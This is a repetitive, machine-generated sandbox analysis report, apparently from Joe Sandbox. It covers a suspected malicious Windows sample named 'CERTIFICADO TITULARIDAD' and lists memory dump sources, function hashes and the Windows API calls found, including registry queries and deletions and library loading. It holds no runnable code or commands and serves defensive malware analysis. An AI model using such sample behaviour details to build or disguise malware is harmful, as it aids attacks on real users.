                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseQueryValue
                                                                                                                          • String ID: Call
                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                          • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                                                                                                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                          • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                                                          • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                                                                                                                          • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                                                          • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                                                          • Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
                                                                                                                          • Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                                                          • Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                                                          • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
                                                                                                                          • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                                                          • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                                                          • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                                                                                          • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                                                          • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                                                          • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                                                                                          • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                                                          • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                                                          • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                                                                                                                          • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                                                          • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                                                          • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                                                                                                                          • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                                                          • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                                                                                            • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                            • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                            • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                                                            • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll), ref: 00405613
                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                                                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 334405425-0
                                                                                                                          • Opcode ID: f4753ed6f3f5fc36ad86420a48cb2d62d22e97b32906aaf41cbb64b33eefa079
                                                                                                                          • Instruction ID: a8e1189db69026d3652efcc6ea6e12950466f7228f8283b9583ebcadfcee3162
                                                                                                                          • Opcode Fuzzy Hash: f4753ed6f3f5fc36ad86420a48cb2d62d22e97b32906aaf41cbb64b33eefa079
                                                                                                                          • Instruction Fuzzy Hash: 8D215031904108BADF11AFA5CE49A9E7AB1BF44359F20413BF105B91E1CBBD89829A5D
                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspD212.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3356406503-0
                                                                                                                          • Opcode ID: a45e245739f5d3a098c963e9d25434660e1bc48630943fa70495a4b54a0239fd
                                                                                                                          • Instruction ID: b0e4e1b430255f92fa12a8c2637aeeefdc8d450e0dea4cce8f1fdd2cec8de2f5
                                                                                                                          • Opcode Fuzzy Hash: a45e245739f5d3a098c963e9d25434660e1bc48630943fa70495a4b54a0239fd
                                                                                                                          • Instruction Fuzzy Hash: 61116A71900219EBDF14DFA0DA989AEB7B4BF04349F20447FE406B62C0D7B84A45EB5E
                                                                                                                          APIs
                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                          • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                          • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                                                                          • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                          • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                                                                          APIs
                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDeleteValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2831762973-0
                                                                                                                          • Opcode ID: 48e787e0f6a4ef370ed6025ccdd3f9acc7286f0c0231b4d39fa44673c6cfe28d
                                                                                                                          • Instruction ID: 823524eaaa32c5521ce5516f6f818df3cdafdbc5371ac3c1d9ba599ed9425974
                                                                                                                          • Opcode Fuzzy Hash: 48e787e0f6a4ef370ed6025ccdd3f9acc7286f0c0231b4d39fa44673c6cfe28d
                                                                                                                          • Instruction Fuzzy Hash: 46F06232A04520ABDB10BBA89A8DAEE62B5AF54314F11443FE502B71C1CAFC4D02976D
                                                                                                                          APIs
                                                                                                                          • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405AB7
                                                                                                                          • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
